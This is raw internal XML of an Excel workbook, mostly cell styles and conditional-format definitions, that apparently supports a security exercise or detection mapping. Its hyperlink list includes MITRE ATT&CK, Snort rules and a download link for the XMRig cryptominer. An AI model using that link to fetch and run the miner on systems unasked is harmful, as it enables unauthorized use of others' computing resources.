    </xf>
    <xf numFmtId="0" fontId="14" fillId="8" borderId="149" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="8" borderId="122" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="8" borderId="123" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="8" borderId="140" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="8" borderId="117" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="8" borderId="132" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="8" borderId="139" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="70" fillId="8" borderId="117" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="2" fontId="5" fillId="0" borderId="8" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="86" fillId="0" borderId="103" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="86" fillId="0" borderId="10" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="86" fillId="0" borderId="98" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="4" borderId="122" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="4" borderId="123" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="102" fillId="14" borderId="38" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="102" fillId="14" borderId="34" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="105" fillId="15" borderId="38" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="105" fillId="15" borderId="34" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="105" fillId="15" borderId="39" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="8" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="96" fillId="15" borderId="38" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="96" fillId="15" borderId="34" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="96" fillId="15" borderId="39" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="14" borderId="38" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="14" borderId="34" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="14" borderId="39" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="15" borderId="38" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="15" borderId="34" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="15" borderId="39" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="12" borderId="38" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="12" borderId="34" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="12" borderId="39" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="95" fillId="13" borderId="38" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="95" fillId="13" borderId="34" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="95" fillId="13" borderId="39" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="10" borderId="38" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="10" borderId="34" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="10" borderId="39" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="11" borderId="38" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="11" borderId="34" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="11" borderId="39" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="36" borderId="38" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="36" borderId="34" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="36" borderId="39" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="77" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"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0" fontId="23" fillId="0" borderId="36" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="0" borderId="37" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="79" fillId="0" borderId="36" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="79" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="79" fillId="0" borderId="37" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="67" fillId="35" borderId="90" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="67" fillId="35" borderId="91" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="67" fillId="35" borderId="92" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="0" borderId="34" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="0" borderId="35" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="0" borderId="77" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="55" fillId="20" borderId="90" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="55" fillId="20" borderId="92" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="64" fillId="0" borderId="34" xfId="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="64" fillId="0" borderId="35" xfId="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="10" borderId="77" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="10" borderId="35" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="101" fillId="27" borderId="77" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="101" fillId="27" borderId="34" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="101" fillId="27" borderId="39" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="101" fillId="28" borderId="38" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="101" fillId="28" borderId="34" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="101" fillId="28" borderId="39" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="101" fillId="29" borderId="38" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="101" fillId="29" borderId="34" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="101" fillId="29" borderId="39" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="101" fillId="37" borderId="38" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="101" fillId="37" borderId="34" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="101" fillId="37" borderId="35" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="101" fillId="26" borderId="77" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="101" fillId="26" borderId="34" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="101" fillId="26" borderId="35" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
  </cellXfs>
  <cellStyles count="7">
    <cellStyle name="Hipervínculo" xfId="4" builtinId="8"/>
    <cellStyle name="Normal" xfId="0" builtinId="0"/>
    <cellStyle name="Normal 2" xfId="1" xr:uid="{00000000-0005-0000-0000-000002000000}"/>
    <cellStyle name="Normal 3" xfId="2" xr:uid="{00000000-0005-0000-0000-000003000000}"/>
    <cellStyle name="Normal 3 2" xfId="5" xr:uid="{00000000-0005-0000-0000-000004000000}"/>
    <cellStyle name="Normal 4" xfId="3" xr:uid="{00000000-0005-0000-0000-000005000000}"/>
    <cellStyle name="Normal 4 2" xfId="6" xr:uid="{00000000-0005-0000-0000-000006000000}"/>
  </cellStyles>
  <dxfs count="673">
    <dxf>
      <font>
        <b/>
        <i/>
        <color rgb="FFFF0000"/>
      </font>
      <fill>
        <patternFill>
          <bgColor theme="5" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i/>
        <color rgb="FFFF0000"/>
      </font>
      <fill>
        <patternFill>
          <bgColor theme="5" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i val="0"/>
        <color rgb="FFFF0000"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFFE1FF"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i/>
        <color theme="4" tint="-0.24994659260841701"/>
      </font>
      <fill>
        <patternFill>
          <bgColor theme="4" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i/>
        <color rgb="FFFF0000"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFFCCFF"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i val="0"/>
        <color rgb="FFFF0000"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFFE1FF"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i/>
        <color theme="4" tint="-0.24994659260841701"/>
      </font>
      <fill>
        <patternFill>
          <bgColor theme="4" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i/>
        <color rgb="FFFF0000"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFFCCFF"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i/>
        <color theme="4" tint="-0.24994659260841701"/>
      </font>
      <fill>
        <patternFill>
          <bgColor theme="4" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i val="0"/>
        <color rgb="FFFF0000"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFFE1FF"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i/>
        <color rgb="FFFF0000"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFFCCFF"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i/>
        <color theme="4" tint="-0.24994659260841701"/>
      </font>
      <fill>
        <patternFill>
          <bgColor theme="4" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i val="0"/>
        <color rgb="FFFF0000"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFFE1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theme="4" tint="-0.24994659260841701"/>
      </font>
      <fill>
        <patternFill>
          <bgColor theme="4" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i val="0"/>
        <color rgb="FFFF0000"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFFE1FF"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i/>
        <color rgb="FFFF0000"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFFCCFF"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i/>
        <color rgb="FFFF0000"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFFCCFF"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i/>
        <color theme="4" tint="-0.24994659260841701"/>
      </font>
      <fill>
        <patternFill>
          <bgColor theme="4" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i val="0"/>
        <color rgb="FFFF0000"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFFE1FF"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i/>
        <color rgb="FFFF0000"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFFCCFF"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i/>
        <color rgb="FFFF0000"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFFCCFF"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i/>
        <color theme="4" tint="-0.24994659260841701"/>
      </font>
      <fill>
        <patternFill>
          <bgColor theme="4" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i val="0"/>
        <color rgb="FFFF0000"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFFE1FF"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i/>
        <color rgb="FFFF0000"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFFCCFF"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i/>
        <color rgb="FFFF0000"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFFCCFF"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i val="0"/>
        <color rgb="FFFF0000"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFFE1FF"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i/>
        <color theme="4" tint="-0.24994659260841701"/>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FF0000"/>
      </font>
      <fill>
        <patternFill>
          <bgColor theme="5"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color theme="7"/>
      </font>
      <fill>
        <patternFill>
          <bgColor theme="7" tint="0.79998168889431442"/>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FF0000"/>
      </font>
      <fill>
        <patternFill>
          <bgColor theme="5" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color theme="7"/>
      </font>
      <fill>
        <patternFill>
          <bgColor theme="7"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CCECFF"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i/>
        <color rgb="FFFF0000"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFCCECFF"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i/>
        <color rgb="FFFF0000"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFCCE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theme="7"/>
      </font>
      <fill>
        <patternFill>
          <bgColor theme="7" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color rgb="FFFF0000"/>
      </font>
      <fill>
        <patternFill>
          <bgColor theme="5"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theme="7"/>
      </font>
      <fill>
        <patternFill>
          <bgColor theme="7" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color rgb="FFFF0000"/>
      </font>
      <fill>
        <patternFill>
          <bgColor theme="5" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color rgb="FF0070C0"/>
      </font>
      <fill>
        <patternFill>
          <bgColor theme="4"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FF0000"/>
      </font>
      <fill>
        <patternFill>
          <bgColor theme="5" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color rgb="FF0070C0"/>
      </font>
      <fill>
        <patternFill>
          <bgColor theme="4"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theme="7"/>
      </font>
      <fill>
        <patternFill>
          <bgColor theme="7"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theme="7"/>
      </font>
      <fill>
        <patternFill>
          <bgColor theme="7"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color rgb="FF0070C0"/>
      </font>
      <fill>
        <patternFill>
          <bgColor theme="4" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color rgb="FFFF0000"/>
      </font>
      <fill>
        <patternFill>
          <bgColor theme="5" tint="0.79998168889431442"/>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i/>
        <color rgb="FFFF0000"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFFCCFF"/>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val="0"/>
        <i val="0"/>
        <color theme="4" tint="-0.24994659260841701"/>
      </font>
      <fill>
        <patternFill>
          <bgColor theme="4" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i val="0"/>
        <color rgb="FFFF0000"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFFE1FF"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i val="0"/>
        <color theme="7" tint="-0.24994659260841701"/>
      </font>
      <fill>
        <patternFill>
          <bgColor theme="7" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i/>
        <color rgb="FFFF0000"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFFCCFF"/>
        </patternFill>
      </fill>
    </dxf>
  </dxfs>
  <tableStyles count="0" defaultTableStyle="TableStyleMedium2" defaultPivotStyle="PivotStyleLight16"/>
  <colors>
    <mruColors>
      <color rgb="FFFFCCFF"/>
      <color rgb="FFCCECFF"/>
      <color rgb="FFCC00CC"/>
      <color rgb="FF000000"/>
      <color rgb="FFFFD1DB"/>
      <color rgb="FFD2002D"/>
      <color rgb="FFFF3F68"/>
      <color rgb="FFFF6D8C"/>
      <color rgb="FFFF9BB0"/>
      <color rgb="FFFFA7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nort.org/downloadsCommunity:%20community-rules.tar.gzRegistered:%20snortrules-snapshot-xxx.tar.g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hyperlink" Target="http://ip/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/xmrig/xmrig/releases/download/v6.11.2/xmrig-6.11.2-linux-x64.tar.gz" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/versions/v17/" TargetMode="External"/><Relationship Id="rId4"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ummaryRight="0"/>
  </sheetPr>
  <dimension ref="A3:Z32"/>
  <sheetViews>
    <sheetView topLeftCell="A3" zoomScale="85" zoomScaleNormal="85" workbookViewId="0">
      <pane xSplit="1" ySplit="3" topLeftCell="B18" activePane="bottomRight" state="frozen"/>
      <selection activeCell="A3" sqref="A3"/>
      <selection pane="topRight" activeCell="B3" sqref="B3"/>
      <selection pane="bottomLeft" activeCell="A8" sqref="A8"/>
      <selection pane="bottomRight" activeCell="N23" sqref="N23"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="12.5703125" defaultRowHeight="15.75" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="19" customWidth="1"/>
    <col min="2" max="2" width="39.140625" customWidth="1"/>
    <col min="3" max="3" width="18.85546875" customWidth="1"/>
    <col min="4" max="4" width="28.42578125" customWidth="1"/>
    <col min="5" max="6" width="19" customWidth="1"/>
    <col min="7" max="7" width="11.42578125" customWidth="1"/>
    <col min="8" max="8" width="11.85546875" customWidth="1"/>
    <col min="9" max="12" width="5.140625" bestFit="1" customWidth="1"/>
    <col min="13" max="13" width="14.5703125" customWidth="1"/>
    <col min="14" max="14" width="15.5703125" customWidth="1"/>
    <col min="15" max="15" width="19.5703125" customWidth="1"/>
    <col min="16" max="16" width="17.140625" customWidth="1"/>
    <col min="17" max="18" width="17.7109375" customWidth="1"/>
    <col min="19" max="19" width="14.28515625" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="3" spans="1:26" ht="24" customHeight="1">
      <c r="A3" s="682" t="s">
        <v>2215</v>
      </c>
      <c r="B3" s="683"/>
      <c r="C3" s="683"/>
      <c r="D3" s="683"/>
      <c r="E3" s="683"/>
      <c r="F3" s="683"/>
      <c r="G3" s="683"/>
      <c r="H3" s="683"/>
      <c r="I3" s="683"/>
      <c r="J3" s="683"/>
      <c r="K3" s="683"/>
      <c r="L3" s="683"/>
      <c r="M3" s="266"/>
      <c r="N3" s="681" t="s">
        <v>2216</v>
      </c>
      <c r="O3" s="681"/>
      <c r="P3" s="681"/>
      <c r="Q3" s="681"/>
      <c r="R3" s="681"/>
      <c r="S3" s="681"/>
      <c r="T3" s="681"/>
    </row>
    <row r="4" spans="1:26" ht="30.75" customHeight="1">
      <c r="A4" s="684"/>
      <c r="B4" s="685"/>
      <c r="C4" s="685"/>
      <c r="D4" s="685"/>
      <c r="E4" s="685"/>
      <c r="F4" s="685"/>
      <c r="G4" s="685"/>
      <c r="H4" s="685"/>
      <c r="I4" s="685"/>
      <c r="J4" s="685"/>
      <c r="K4" s="685"/>
      <c r="L4" s="685"/>
      <c r="M4" s="266"/>
      <c r="N4" s="685" t="s">
        <v>2276</v>
      </c>
      <c r="O4" s="685"/>
      <c r="P4" s="685"/>
      <c r="Q4" s="266"/>
      <c r="R4" s="323"/>
      <c r="S4" s="323"/>
      <c r="T4" s="323"/>
    </row>
    <row r="5" spans="1:26" ht="40.700000000000003" customHeight="1">
      <c r="A5" s="267" t="s">
        <v>2217</v>
      </c>
      <c r="B5" s="268" t="s">
        <v>2218</v>
      </c>
      <c r="C5" s="268" t="s">
        <v>2219</v>
      </c>
      <c r="D5" s="268" t="s">
        <v>2220</v>
      </c>
      <c r="E5" s="268" t="s">
        <v>2221</v>
      </c>
      <c r="F5" s="268" t="s">
        <v>2222</v>
      </c>
      <c r="G5" s="268" t="s">
        <v>0</v>
      </c>
      <c r="H5" s="268" t="s">
        <v>1</v>
      </c>
      <c r="I5" s="269" t="s">
        <v>2</v>
      </c>
      <c r="J5" s="268" t="s">
        <v>3</v>
      </c>
      <c r="K5" s="268" t="s">
        <v>1758</v>
      </c>
      <c r="L5" s="268" t="s">
        <v>1759</v>
      </c>
      <c r="N5" s="268" t="s">
        <v>1760</v>
      </c>
      <c r="O5" s="268" t="s">
        <v>1761</v>
      </c>
      <c r="P5" s="268" t="s">
        <v>1762</v>
      </c>
      <c r="R5" s="270" t="s">
        <v>2223</v>
      </c>
      <c r="S5" s="270" t="s">
        <v>2224</v>
      </c>
      <c r="T5" s="270" t="s">
        <v>2225</v>
      </c>
    </row>
